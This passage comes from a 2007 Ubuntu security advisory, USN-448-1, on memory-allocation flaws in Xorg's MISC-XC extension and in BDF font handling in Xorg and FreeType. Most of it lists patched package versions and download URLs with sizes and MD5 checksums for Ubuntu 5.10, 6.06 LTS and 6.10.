or damage arising from use of, or reliance on, this information. =========================================================== Ubuntu Security Notice USN-448-1 April 03, 2007 freetype, libxfont, xorg, xorg-server vulnerabilities CVE-2007-1003, CVE-2007-1351, CVE-2007-1352 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libfreetype6 2.1.7-2.4ubuntu1.3 libxfont1 1:0.99.0+cvs.20050909-1.3 xserver-xorg-core 6.8.2-77.3 Ubuntu 6.06 LTS: libfreetype6 2.1.10-1ubuntu2.3 libxfont1 1:1.0.0-0ubuntu3.3 xserver-xorg-core 1:1.0.2-0ubuntu10.6 Ubuntu 6.10: libfreetype6 2.2.1-5ubuntu0.1 libxfont1 1:1.2.0-0ubuntu3.1 xserver-xorg-core 1:1.1.1-0ubuntu12.2 After a standard system upgrade you need to reboot your computer to effect the necessary changes. Details follow: Sean Larsson of iDefense Labs discovered that the MISC-XC extension of Xorg did not correctly verify the size of allocated memory. (CVE-2007-1003) Greg MacManus of iDefense Labs discovered that the BDF font handling code in Xorg and FreeType did not correctly verify the size of allocated memory. (CVE-2007-1351, CVE-2007-1352) Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.7-2.4ubuntu1.3.diff.gz Size/MD5: 57463 b8f6fa3ee48672ceca86bf9625536545 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.7-2.4ubuntu1.3.dsc Size/MD5: 695 b4b76f4eb02a68844666cecef2655e87 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.7.orig.tar.gz Size/MD5: 1245623 991ff86e88b075ba363e876f4ea58680 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont_0.99.0+cvs.20050909-1.3.diff.gz Size/MD5: 7087 fa6f3d6472398c4afe51232508d5bd25 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont_0.99.0+cvs.20050909-1.3.dsc Size/MD5: 771 220ed305b077585687ccec6564955b03 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont_0.99.0+cvs.20050909.orig.tar.gz Size/MD5: 788911 32b390bd94e4250475702e668b2bf243 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xorg_6.8.2-77.3.diff.gz Size/MD5: 2491611 eaa8cba7cdd69c746d88c0c28fe51c5c http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xorg_6.8.2-77.3.dsc Size/MD5: 3728 9ae8a29c6619763c73ac3c7554615886 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xorg_6.8.2.orig.tar.gz Size/MD5: 49471925 34cba217afe2c547e3a72657a3a27e37 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xbase-clients_6.8.2-77.3_all.deb Size/MD5: 65788 12bad26276ea4cb67cd2ef6959e8dc59 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-data_6.8.2-77.3_all.deb Size/MD5: 72432 2c968bd2d7fcc1f5f7ebbc07193f58a5 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-dev_6.8.2-77.3_all.deb Size/MD5: 65560 073f34a0d879c566823c70a701e40aeb http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs_6.8.2-77.3_all.deb Size/MD5: 92072 af61cbb4688ff1affeed10a82a8660dc http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xorg-common_6.8.2-77.3_all.deb Size/MD5: 715620 e4f2e86619a5f21ed660eca3f03897e3 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xutils_6.8.2-77.3_all.deb Size/MD5: 65536 e1edff49971cdb0872f71941f37950b3 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.7-2.4ubuntu1.3_amd64.deb Size/MD5: 75540 9be3f1b17f6ca112f2907b69d1e87ffa http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.7-2.4ubuntu1.3_amd64.deb Size/MD5: 722918 748a13b1cfbdf910d89f435a822d0546 http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.7-2.4ubuntu1.3_amd64.udeb Size/MD5: 241784 bc3519b183a983495121373cd78c9456 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.7-2.4ubuntu1.3_amd64.deb Size/MD5: 392948 d6f2e48fe489ca394fad153c07400d14 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_0.99.0+cvs.20050909-1.3_amd64.deb Size/MD5: 297970 157c10e1e0db8aced07b462777318da5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_0.99.0+cvs.20050909-1.3_amd64.deb Size/MD5: 377708 bfc5fba5bc6305a66dc0836712e7a91b http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_0.99.0+cvs.20050909-1.3_amd64.deb Size/MD5: 243588 f275099ce971aa990f3d28e0d7aea5f3 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/x-window-system-core_6.8.2-77.3_amd64.deb Size/MD5: 65746 e85a37b8b5ca3e0150961324914dd38a http://security.ubuntu.com/ubuntu/pool/main/x/xorg/x-window-system-dev_6.8.2-77.3_amd64.deb Size/MD5: 65774 dd5d197fe97c558ec418dde967a914a1 http://security.ubuntu.com/ubuntu/pool/universe/x/xorg/xdmx_6.8.2-77.3_amd64.deb Size/MD5: 1029630 40e93609ec560b44558b86cc717d2991 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-static-dev_6.8.2-77.3_amd64.deb Size/MD5: 117402 35860dfb00719c6fffddb2b4a5747abd http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-static-pic_6.8.2-77.3_amd64.deb Size/MD5: 113704 24f40fbf5593dd653e72f6c2797516c0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xnest_6.8.2-77.3_amd64.deb Size/MD5: 1526642 e357f9979668602743c2596992abee80 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-common_6.8.2-77.3_amd64.deb Size/MD5: 123324 d10670b3b2a2ae50b816062e004d1b7f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-core_6.8.2-77.3_amd64.deb Size/MD5: 3993068 d361ba44f7464198b2d990dd2f939ff3 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-dbg_6.8.2-77.3_amd64.deb Size/MD5: 4773852 f644788b79b0d0a6deb0bb3e27743416 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-apm_6.8.2-77.3_amd64.deb Size/MD5: 126370 521f72819330e496e89a253021cf5215 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-ark_6.8.2-77.3_amd64.deb Size/MD5: 73882 3ebb4a5f56625e7b78d9e536072bc763 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-ati_6.8.2-77.3_amd64.deb Size/MD5: 324240 e01da75bc223cdd1b8699b19291334d6 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-chips_6.8.2-77.3_amd64.deb Size/MD5: 152244 43f0e543b835068278f56c60690769bf http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-cirrus_6.8.2-77.3_amd64.deb Size/MD5: 101702 9ebbefa73e1c3194b6c04269fdb292d8 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-cyrix_6.8.2-77.3_amd64.deb Size/MD5: 81032 5d524764bb1c2bd8b918ed563b68886e http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-dummy_6.8.2-77.3_amd64.deb Size/MD5: 70664 2db770e3cc6802174762f55c99ffd1b4 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-fbdev_6.8.2-77.3_amd64.deb Size/MD5: 74290 49d5ffa068a163464a569a4c8cd662f1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-glint_6.8.2-77.3_amd64.deb Size/MD5: 160244 e59c1b781ec041ac3df2486743ba07cc http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-i128_6.8.2-77.3_amd64.deb Size/MD5: 89792 4b5528d20347eb721df443aa14be6084 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-i810_6.8.2-77.3_amd64.deb Size/MD5: 168474 a98c9ebf3b71b96066ee96c461e51de1 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-mga_6.8.2-77.3_amd64.deb Size/MD5: 154206 f146cd927b79c7f43fc4afe904fd7028 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-neomagic_6.8.2-77.3_amd64.deb Size/MD5: 99620 45382b9464fc7c21021ca81f7601977a http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-nv_6.8.2-77.3_amd64.deb Size/MD5: 131230 d73416650296039e0d59d2a2b75f2d8e http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-rendition_6.8.2-77.3_amd64.deb Size/MD5: 90240 5af0c68193b4349fbcd239ec482ed2ab http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-s3_6.8.2-77.3_amd64.deb Size/MD5: 91726 cb82c871f03ffb6e968bea210a6af75d http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-s3virge_6.8.2-77.3_amd64.deb Size/MD5: 104188 eb7e8e83da3cf9b4e7c65ed24b92a2e0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-savage_6.8.2-77.3_amd64.deb Size/MD5: 107776 31c8cc09a6a9241c91d2c03975287842 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-siliconmotion_6.8.2-77.3_amd64.deb Size/MD5: 105300 e06379b5530410c398c23d24e4a2682d http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-sis_6.8.2-77.3_amd64.deb Size/MD5: 340896 0114deb2e7cea78860e08ada6fc9d3d9 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-tdfx_6.8.2-77.3_amd64.deb Size/MD5: 99038 bd5c774e186120d851799de0d060ef3f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-tga_6.8.2-77.3_amd64.deb Size/MD5: 88846 e611135fac9da5e514defd35fadd8025 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-trident_6.8.2-77.3_amd64.deb Size/MD5: 132244 aab798cb57d644b327fe6a7bb5c51637 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-tseng_6.8.2-77.3_amd64.deb Size/MD5: 96404 3ee874ea69eefd45491d6ca56830f307 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-v4l_6.8.2-77.3_amd64.deb Size/MD5: 73392 6d5439acff5d2098ca6741cfb8ef6a00 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-vesa_6.8.2-77.3_amd64.deb Size/MD5: 77434 6e8e03907c375a01588e05d5e1b18b23 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-vga_6.8.2-77.3_amd64.deb Size/MD5: 75352 b12939451111e63dd0917362e42ec4cf http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-acecad_6.8.2-77.3_amd64.deb Size/MD5: 70676 730768c822fa4c806bab0459866971aa http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-aiptek_6.8.2-77.3_amd64.deb Size/MD5: 80550 184a471135082d501936061092fb607f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-calcomp_6.8.2-77.3_amd64.deb Size/MD5: 70248 656d22076f2b45ded25f4d2f08d8801a http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-citron_6.8.2-77.3_amd64.deb Size/MD5: 90044 676d14ebebf88b4e12114b08b169003c http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-digitaledge_6.8.2-77.3_amd64.deb Size/MD5: 71032 fd5b286d4122018630fe6afec181edb6 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-dmc_6.8.2-77.3_amd64.deb Size/MD5: 70166 f1c622c52ee792548953adce5f372a2d http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-dynapro_6.8.2-77.3_amd64.deb Size/MD5: 69772 099498b9bb81379b15f5c24741a2befc http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-elographics_6.8.2-77.3_amd64.deb Size/MD5: 73234 3410e093a87090fcf4ca0134c7f00ab3 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-fpit_6.8.2-77.3_amd64.deb Size/MD5: 70778 b37384a5c58b046fef89f487ff49f5a0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-hyperpen_6.8.2-77.3_amd64.deb Size/MD5: 72940 b873ef7a14637241aacfbce9951b60da http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-kbd_6.8.2-77.3_amd64.deb Size/MD5: 74632 79a5026db158fb123ff54af1e35d501d http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-magellan_6.8.2-77.3_amd64.deb Size/MD5: 69366 8f0c8b39e5f88d657a8c038aae1305eb http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-microtouch_6.8.2-77.3_amd64.deb Size/MD5: 72022 0dd20d44c7f77c47c3dd3f7a3353b894 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-mouse_6.8.2-77.3_amd64.deb Size/MD5: 98390 2c172d033b5252846ceeee40990d0a16 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-mutouch_6.8.2-77.3_amd64.deb Size/MD5: 73580 3d3b88bf32deff96a074b58a30a0cbee http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-palmax_6.8.2-77.3_amd64.deb Size/MD5: 71608 db4f436ea8ad1ecf12698014afca127f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-penmount_6.8.2-77.3_amd64.deb Size/MD5: 70346 ca124fdfda754fcd9a91adb46d62a84e http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-spaceorb_6.8.2-77.3_amd64.deb Size/MD5: 69124 ac4fa56df52b175d81769cc20caf3777 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-summa_6.8.2-77.3_amd64.deb Size/MD5: 72888 c1279a890e388b9cdb7e8e79c6e6cafb http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-tek4957_6.8.2-77.3_amd64.deb Size/MD5: 70860 c17d207b3d04bd35ad5afa7ba56597e7 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-void_6.8.2-77.3_amd64.deb Size/MD5: 67680 77d2e92de46a38a197f62355e45a84ee http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-wacom_6.8.2-77.3_amd64.deb Size/MD5: 101040 b66ac048fc5858c86e9dc079c79f8b38 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg_6.8.2-77.3_amd64.deb Size/MD5: 274146 40e3014ce80f6be8852fa043105bab70 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xvfb_6.8.2-77.3_amd64.deb Size/MD5: 1640494 bf0c8235665a11c099cd227ad2b3a60b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.7-2.4ubuntu1.3_i386.deb Size/MD5: 52860 8f9822785a4d4feeb120b7ef6d874709 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.7-2.4ubuntu1.3_i386.deb Size/MD5: 686404 46b3001cdee7cd73141461033f8f4482 http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.7-2.4ubuntu1.3_i386.udeb Size/MD5: 209260 17f5df161bde9954b46051ef2e989159 http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.7-2.4ubuntu1.3_i386.deb Size/MD5: 361112 e8d31f9d89c442a5834144b374b49a54 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_0.99.0+cvs.20050909-1.3_i386.deb Size/MD5: 275968 4d5e4d8c032a149c09033a3f4d078faa http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_0.99.0+cvs.20050909-1.3_i386.deb Size/MD5: 321688 f7e708a09b31924830357d10ad2fec40 http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_0.99.0+cvs.20050909-1.3_i386.deb Size/MD5: 217758 a18b74fa709fa38ba055e8e4b820a09c http://security.ubuntu.com/ubuntu/pool/main/x/xorg/x-window-system-core_6.8.2-77.3_i386.deb Size/MD5: 65750 86dfe78dfa09f1d7a52d646fb10401cf http://security.ubuntu.com/ubuntu/pool/main/x/xorg/x-window-system-dev_6.8.2-77.3_i386.deb Size/MD5: 65778 5dbe48fb74851b2c6e85cd143560884a http://security.ubuntu.com/ubuntu/pool/universe/x/xorg/xdmx_6.8.2-77.3_i386.deb Size/MD5: 880068 69e876557cbb97c0b51a2574f2ab4a2a http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-static-dev_6.8.2-77.3_i386.deb Size/MD5: 111442 5fb72b1e75b0a6e8a528940045233288 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xlibs-static-pic_6.8.2-77.3_i386.deb Size/MD5: 107366 88bf57b6009f6e5e1b74543933d90952 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xnest_6.8.2-77.3_i386.deb Size/MD5: 1282444 a1616fca7bbd45734eeac5dbadd4ddca http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-common_6.8.2-77.3_i386.deb Size/MD5: 122984 46402235fcb4c943f421d0081767c228 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-core_6.8.2-77.3_i386.deb Size/MD5: 3393114 cf2287d566a90325bdf5d37d0d772c9f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-dbg_6.8.2-77.3_i386.deb Size/MD5: 21046384 e74d9ad7ebea1118a0991b54de50b21b http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-apm_6.8.2-77.3_i386.deb Size/MD5: 122974 a2d63f1a30e2e8778d3737d334224e44 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-ark_6.8.2-77.3_i386.deb Size/MD5: 72406 c79fce80a122bcb69cb8aa2840027183 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-ati_6.8.2-77.3_i386.deb Size/MD5: 300354 be69393fd4c49073fc291d4382682af6 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-chips_6.8.2-77.3_i386.deb Size/MD5: 147054 13477206d327d76ed6cc6760081b6a0d http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-cirrus_6.8.2-77.3_i386.deb Size/MD5: 94812 6dbbfc2081ce19bd705e65a76c370b18 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-cyrix_6.8.2-77.3_i386.deb Size/MD5: 79216 96e108be36d7e96d1d7c61c55d2eada5 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-dummy_6.8.2-77.3_i386.deb Size/MD5: 69808 919b659eacec53b4612e0fac956adca7 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-fbdev_6.8.2-77.3_i386.deb Size/MD5: 73250 78bb84280077b3aba53beded9161a244 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-glide_6.8.2-77.3_i386.deb Size/MD5: 74914 040afc6608d22fee2eae20ba8b0e840b http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-glint_6.8.2-77.3_i386.deb Size/MD5: 159892 2780f991c85e2be15dda1635f8c98b11 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-i128_6.8.2-77.3_i386.deb Size/MD5: 87476 f4505c09091c8d4e49b3bbb345340e2e http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-i740_6.8.2-77.3_i386.deb Size/MD5: 86544 d08ed7ba7921a6341be43b1b597c7c01 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-i810_6.8.2-77.3_i386.deb Size/MD5: 158570 b6a1db2cde816a16be29d2aeb627ebee http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-imstt_6.8.2-77.3_i386.deb Size/MD5: 73262 07d1fa25882621bad5be61b318fd3a66 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-mga_6.8.2-77.3_i386.deb Size/MD5: 143748 8868549c96ba8150954a69cbf3730801 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-neomagic_6.8.2-77.3_i386.deb Size/MD5: 95818 b3b86c3fdce299e35aba1f8189fe5005 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-newport_6.8.2-77.3_i386.deb Size/MD5: 74236 e55cf778b3b0f1d43604722bdd8689b2 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-nsc_6.8.2-77.3_i386.deb Size/MD5: 160514 2ececee8091f44f6dd61de03d9ddf77e http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-nv_6.8.2-77.3_i386.deb Size/MD5: 123050 8e43b21c9dce1af5e5b88f24b8239952 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-rendition_6.8.2-77.3_i386.deb Size/MD5: 87578 52ec26ae5b375ef892d6a86f180577db http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-s3_6.8.2-77.3_i386.deb Size/MD5: 88736 1538d94d86c0603bde8c1f8504121c8f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-s3virge_6.8.2-77.3_i386.deb Size/MD5: 100086 c31e59302ae59a2b4eeb015050922b41 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-savage_6.8.2-77.3_i386.deb Size/MD5: 102452 f1eec9b8382457b89406d69b526ad11e http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-siliconmotion_6.8.2-77.3_i386.deb Size/MD5: 102018 fe04cd8d4a6e461491add407142d3ff8 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-sis_6.8.2-77.3_i386.deb Size/MD5: 320680 c7a5363feaea7213a73835fb53a023dd http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-tdfx_6.8.2-77.3_i386.deb Size/MD5: 94190 4b8e7c65cc416de4a6d4691250776493 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-tga_6.8.2-77.3_i386.deb Size/MD5: 86104 94013a70b7734e0f4205e723093f71a0 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-trident_6.8.2-77.3_i386.deb Size/MD5: 125852 2352b91c3e6f9de7f5e5d63efdb22c82 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-tseng_6.8.2-77.3_i386.deb Size/MD5: 93760 809003f68c722bd4cfae1a197fc5f652 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-v4l_6.8.2-77.3_i386.deb Size/MD5: 72098 5651248f206d8b9987370ebbd24531ab http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-vesa_6.8.2-77.3_i386.deb Size/MD5: 75834 e41fa0b5de64e33a4c38c15f947cbb37 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-vga_6.8.2-77.3_i386.deb Size/MD5: 74320 9f80f3d04c9ffd9f5a505847a7fbbc4e http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-via_6.8.2-77.3_i386.deb Size/MD5: 138682 7e1c4877500e1dca3a735dd2f33d3193 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-driver-vmware_6.8.2-77.3_i386.deb Size/MD5: 81378 ea3a2925ac33d30af17a184c1160ab34 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-acecad_6.8.2-77.3_i386.deb Size/MD5: 70188 dbba5b087d2dd682d7df359c6ecf7aaa http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-aiptek_6.8.2-77.3_i386.deb Size/MD5: 79394 52f292de69593f4126072df958002b5d http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-calcomp_6.8.2-77.3_i386.deb Size/MD5: 69716 edd13af3e98d5f70248479424f7597c2 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-citron_6.8.2-77.3_i386.deb Size/MD5: 87794 c6c08212db44d8cf26e0884a04c2d9b9 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-digitaledge_6.8.2-77.3_i386.deb Size/MD5: 70516 a91e7e0beab053a8ff753050c2f15b35 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-dmc_6.8.2-77.3_i386.deb Size/MD5: 69564 618499e29d79c7bc8f11ffa925c09b75 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-dynapro_6.8.2-77.3_i386.deb Size/MD5: 69266 f457352b4675b27b7d40337cbe0a2695 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-elographics_6.8.2-77.3_i386.deb Size/MD5: 71954 153e6af112f360033a37aeb4670c14cc http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-fpit_6.8.2-77.3_i386.deb Size/MD5: 70338 c01097e2eb0a2a3abc95a3dfa0247327 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-hyperpen_6.8.2-77.3_i386.deb Size/MD5: 71888 2f84d4568562561ef3498c9791ccab7f http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-kbd_6.8.2-77.3_i386.deb Size/MD5: 73402 7e0ab015ba49f103afb96c7211ce5755 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-magellan_6.8.2-77.3_i386.deb Size/MD5: 68822 4f17e665de66a9940ff3c6722fb08198 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-microtouch_6.8.2-77.3_i386.deb Size/MD5: 71282 ac55322bb00e6c33b1f764e47a2896e2 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-mouse_6.8.2-77.3_i386.deb Size/MD5: 96556 c3fce835be42eb0c31d03056fac32376 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-mutouch_6.8.2-77.3_i386.deb Size/MD5: 72546 05232e76ad9b9dc93d3db86c423d1b7c http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-palmax_6.8.2-77.3_i386.deb Size/MD5: 71022 4fd42ec380a437249a026bedc2e44cfe http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-penmount_6.8.2-77.3_i386.deb Size/MD5: 69748 7f95915c766d8f5486b6ee4af5f824ca http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-spaceorb_6.8.2-77.3_i386.deb Size/MD5: 68636 6e64a58144fd2364f5a27cacadc668a4 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-summa_6.8.2-77.3_i386.deb Size/MD5: 71956 f9a757c36bec95a75413995401d7fec8 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-tek4957_6.8.2-77.3_i386.deb Size/MD5: 70302 2ec147acfc14c068896185d2dd01887a http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-void_6.8.2-77.3_i386.deb Size/MD5: 67446 ca456ab89714cb807ab26dfa676578b2 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-wacom_6.8.2-77.3_i386.deb Size/MD5: 96986 2799f489d096d23cc91037d7705f7abd http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg_6.8.2-77.3_i386.deb Size/MD5: 274176 ea1d2fc5b60b7754d47ada4cbbe7a612 http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xvfb_6.8.2-77.3_i386.deb Size/MD5: 1383664 7fca88ca86e1d9545c0a5a7ed877f2cf powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.7-2.4ubuntu1.3_powerpc.deb Size/MD5: 80654 12c06589e94a6d6da139a27d5bd48b4c http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.7-2.4ubuntu1.3_powerpc.deb Size/MD5: 729308 9c85d5592d0f162884bc52bc82e09457 